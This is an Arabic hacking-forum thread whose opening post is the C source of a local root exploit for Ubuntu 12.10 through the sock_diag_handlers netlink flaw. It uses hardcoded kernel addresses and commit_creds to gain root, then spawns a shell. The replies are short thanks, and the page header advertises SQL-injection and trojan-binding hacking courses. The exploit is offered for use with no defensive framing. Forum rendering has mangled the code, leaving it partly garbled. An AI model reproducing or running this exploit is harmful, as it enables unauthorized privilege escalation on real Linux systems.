1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit

الموضوع في '[ الـثـغـرات ]' بواسطة nasern, بتاريخ ‏17 مارس 2013.

كاتب الموضوع : nasern المشاهدات : 1,300 الردود : 5 ‏17 مارس 2013
حالة الموضوع:
مغلق
  1. غير متصل

    nasern
    Active DeveloPer

    عضو منذ:
    ‏26 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    [ مقدمة ]

    بسم الله الرحمن الرحيم
    و الصلاة والسلام على أشرف الأنبياء والمرسلين
    سيدنا وحبيبنا محمدا عليه أفضل الصلاة وأزكى التسليم
    وعلى أصحابه الطيبين الطاهرين الى يوم الدين
    أما بعد,,,

    ---------------------------------------------



    [ الثغره ]





    كود PHP:
    #include <unistd.h>
    #include <sys/socket.h>
    #include <linux/netlink.h>
    #include <netinet/tcp.h>
    #include <errno.h>
    #include <linux/if.h>
    #include <linux/filter.h>
    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <linux/sock_diag.h>
    #include <linux/inet_diag.h>
    #include <linux/unix_diag.h>
    #include <sys/mman.h>
     
    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;
    unsigned long sock_diag_handlersnl_table;
     
    int __attribute__((regparm(3)))
    x()
    {
        
    commit_creds(prepare_kernel_cred(0));
        return -
    1;
    }
     
    char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
     
    int main() {
        
    int fd;
        
    unsigned long mmap_startmmap_size 0x10000;
        
    unsigned family;
        
    struct {
            
    struct nlmsghdr nlh;
            
    struct unix_diag_req r;
        } 
    req;
        
    char    buf[8192];
     
        if ((
    fd socket(AF_NETLINKSOCK_RAWNETLINK_SOCK_DIAG)) < 0){
            
    printf("Can't create sock diag socket\n");
            return -
    1;
        }
     
        
    memset(&req0sizeof(req));
        
    req.nlh.nlmsg_len sizeof(req);
        
    req.nlh.nlmsg_type SOCK_DIAG_BY_FAMILY;
        
    req.nlh.nlmsg_flags NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
        
    req.nlh.nlmsg_seq 123456;
     
        
    req.r.udiag_states = -1;
        
    req.r.udiag_show UDIAG_SHOW_NAME UDIAG_SHOW_PEER UDIAG_SHOW_RQLEN;
     
        
    /* Ubuntu 12.10 x86_64 */
        
    req.r.sdiag_family 0x37;
        
    commit_creds = (_commit_creds0xffffffff8107d180;
        
    prepare_kernel_cred = (_prepare_kernel_cred0xffffffff8107d410;
        
    mmap_start 0x1a000;
     
        if (
    mmap((void*)mmap_startmmap_sizePROT_READ|PROT_WRITE|PROT_EXEC,
            
    MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -10) == MAP_FAILED) {
     
            
    printf("mmap fault\n");
            exit(
    1);
        }
     
        *(
    unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
        
    memset((void *)mmap_start0x90mmap_size);
        
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1sizeof(stage1));
     
        
    send(fd, &reqsizeof(req), 0);
        if(!
    getuid())
            
    system("/bin/sh");
    }
     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.
     


  3. غير متصل

    slam
    ExpErt DeveloPer

    عضو منذ:
    ‏14 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    رد: Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit

    مبــدع
    وآإأصل

    )5:"
     


  4. غير متصل

    ÍяâΘ
    rankrank
    Developer

    عضو منذ:
    ‏30 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit

    تعيش يابطل ​
     


  5. غير متصل

    DarK c0d3r
    rank
    Developer

    عضو منذ:
    ‏12 أكتوبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit

    :{2}:​
     


  6. غير متصل

    Dr.hac
    rankrank
    Developer

    عضو منذ:
    ‏8 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit

    مشكور اخي &:":​
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...